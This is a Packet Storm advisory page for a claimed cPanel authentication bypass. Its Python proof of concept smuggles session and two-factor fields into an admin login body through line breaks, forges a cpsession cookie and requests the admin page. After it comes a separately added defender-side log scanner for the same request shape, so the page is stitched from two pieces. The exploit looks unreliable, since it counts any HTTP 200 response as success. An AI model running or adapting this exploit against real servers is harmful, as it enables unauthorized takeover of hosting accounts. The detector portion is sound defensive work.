PACKETSTORM 9.8 CRITICAL

cPanel Authentication Manipulation / Session Injection (PACKETSTORM:220249)

9.8 / 10
CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This Python script attempts an authentication bypass against a cPanel login endpoint by crafting a modified login request and manipulating session-related data. Versions after 11.40 are affected...

Basic Information

ID PACKETSTORM:220249
Published May 4, 2026 at 00:00

Affected Product

Affected Versions

==================================================================================================================================
| # Title : cPanel versions after 11.40 Authentication Manipulation Session Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.cpanel.net |
==================================================================================================================================

[+] Summary : This Python script attempts an authentication bypass against a web login endpoint by crafting a modified login request and manipulating session-related data.

[+] POC :


import requests
import urllib3
import sys
import time

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def final_badr_bank_bypass(target):
    target = target.rstrip('/')
    login_url = f"{target}/login/"
    magic_token = "indoushka"

    server_ts = int(time.time())

    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/125.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
    }

    # Form body sent as a raw string: the extra session fields are separated
    # from "user=admin" by line breaks rather than by "&".
    payload = (
        f"user=admin\ncp_security_token={magic_token}\n"
        f"tfa_verified=1\nsuccessful_external_auth_with_timestamp={server_ts}"
        f"&pass=security_audit_2026"
    )

    print(f"[*] Target: {target} | Attempting to exploit Status 200...")

    try:
        session = requests.Session()

        inject_resp = session.post(login_url, data=payload, headers=headers, verify=False)
        print(f"[+] Injection Step: {inject_resp.status_code}")

        # Cookie is set for the bare hostname (scheme and port stripped from the target).
        session.cookies.set("cpsession", f":{magic_token}", domain=target.split('//')[-1].split(':')[0])

        admin_url = f"{target}/cpsess{magic_token}/main.html"
        print(f"[*] Accessing Admin Area with injected session: {admin_url}")

        final_resp = session.get(admin_url, verify=False, timeout=10, allow_redirects=True)

        # Success is judged only on the HTTP status of the final response.
        if final_resp.status_code == 200:
            print("[!!!] SUCCESS: Session Promotion Achieved!")
        elif "Invalid" in final_resp.text or final_resp.status_code == 401:
            print("[-] Promotion Denied: Session is poisoned but integrity check rejected it.")
        else:
            print(f"[-] Final Status: {final_resp.status_code}. (Possible WAF interference)")

    except Exception as e:
        print(f"[X] Error: {e}")

if __name__ == "__main__":
    target_addr = sys.argv[1] if len(sys.argv) > 1 else "https://cpanel.127.0.0.1dz:2083"
    final_badr_bank_bypass(target_addr)
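A defender-side check for the request shape this advisory describes, added here as an example; it is not part of the original advisory and not cPanel's own code. It scans request records for three indicators taken from the PoC above: line breaks inside a login form field that carry extra key=value pairs naming session or authentication state, a cpsession cookie with an empty user part, and a /cpsess<token>/ path whose token is not a server-issued one. The JSON-lines record format, the ten-digit token shape and the user:token cookie layout are assumptions made for the example, not facts from the advisory; the sample log is constructed.

```python
import json
import re
from urllib.parse import parse_qs

# Login-state fields named in the advisory's payload; a browser login POST
# has no legitimate reason to carry any of them.
PRIVILEGED_FIELDS = {
    "cp_security_token",
    "tfa_verified",
    "successful_external_auth_with_timestamp",
}

# ASSUMPTION (not from the advisory): server-issued session tokens are
# treated here as ten decimal digits. Adjust to the real deployment.
SESSION_TOKEN_RE = re.compile(r"^[0-9]{10}$")
CPSESS_PATH_RE = re.compile(r"^/cpsess([^/]*)/")


def analyze_login_body(body):
    """Return finding tags for one application/x-www-form-urlencoded login body."""
    findings = []
    # parse_qs splits on '&' and on the first '=', so a value that contains
    # raw line breaks survives intact and can be inspected here.
    fields = parse_qs(body, keep_blank_values=True)
    for name, values in fields.items():
        if name in PRIVILEGED_FIELDS:
            findings.append(f"client_supplied_field:{name}")
        for value in values:
            if "\r" in value or "\n" in value:
                findings.append(f"crlf_in_field:{name}")
                # Every line after the first that looks like key=value is a
                # second, smuggled field; report the privileged ones by name.
                for part in re.split(r"[\r\n]+", value)[1:]:
                    key = part.split("=", 1)[0]
                    if key in PRIVILEGED_FIELDS:
                        findings.append(f"smuggled_field:{key}")
    return findings


def analyze_request(rec):
    """Return finding tags for one request record (a dict parsed from JSON)."""
    findings = []
    path = rec.get("path", "")
    if rec.get("method") == "POST" and path.rstrip("/") == "/login":
        findings.extend(analyze_login_body(rec.get("body", "")))
    m = CPSESS_PATH_RE.match(path)
    if m and not SESSION_TOKEN_RE.match(m.group(1)):
        findings.append(f"bad_session_path_token:{m.group(1)}")
    cookie = rec.get("cookies", {}).get("cpsession")
    if cookie is not None:
        # ASSUMPTION: cookie layout is "<user>:<token...>". The advisory's
        # forged value starts with ':' (empty user) and a non-issued token.
        user, _, token = cookie.partition(":")
        if not user or not SESSION_TOKEN_RE.match(token.split(",")[0]):
            findings.append("forged_cpsession_cookie")
    return findings


def scan_log(lines):
    """Scan JSON-lines request records; return [(line_no, findings)] for hits only."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        findings = analyze_request(json.loads(line))
        if findings:
            hits.append((line_no, findings))
    return hits


# Constructed sample log: a normal login, a login body shaped like the
# advisory's payload, and a follow-up GET carrying the forged session.
SAMPLE_LOG = [
    json.dumps({"method": "POST", "path": "/login/",
                "body": "user=alice&pass=correct-horse", "cookies": {}}),
    json.dumps({"method": "POST", "path": "/login/",
                "body": "user=admin\ncp_security_token=indoushka\ntfa_verified=1\n"
                        "successful_external_auth_with_timestamp=1777852800&pass=security_audit_2026",
                "cookies": {}}),
    json.dumps({"method": "GET", "path": "/cpsessindoushka/main.html", "body": "",
                "cookies": {"cpsession": ":indoushka"}}),
]

if __name__ == "__main__":
    for line_no, findings in scan_log(SAMPLE_LOG):
        print(f"record {line_no}: {', '.join(findings)}")
```

Run stand-alone, the script reports records 2 and 3 and stays silent on the normal login. The first check (line breaks and smuggled key=value pairs inside a field) is the robust one, because it depends only on how form bodies are encoded; the cookie and path checks must be tuned to the real token and cookie formats of the deployment before they are used for alerting. Whatever the detector reports, the server-side property that matters is that authentication state such as a 2FA-verified flag or an external-auth timestamp is never accepted from the client's login request, and that the session token in the URL is validated against the session cookie rather than taken at face value.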


Greetings to :
==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
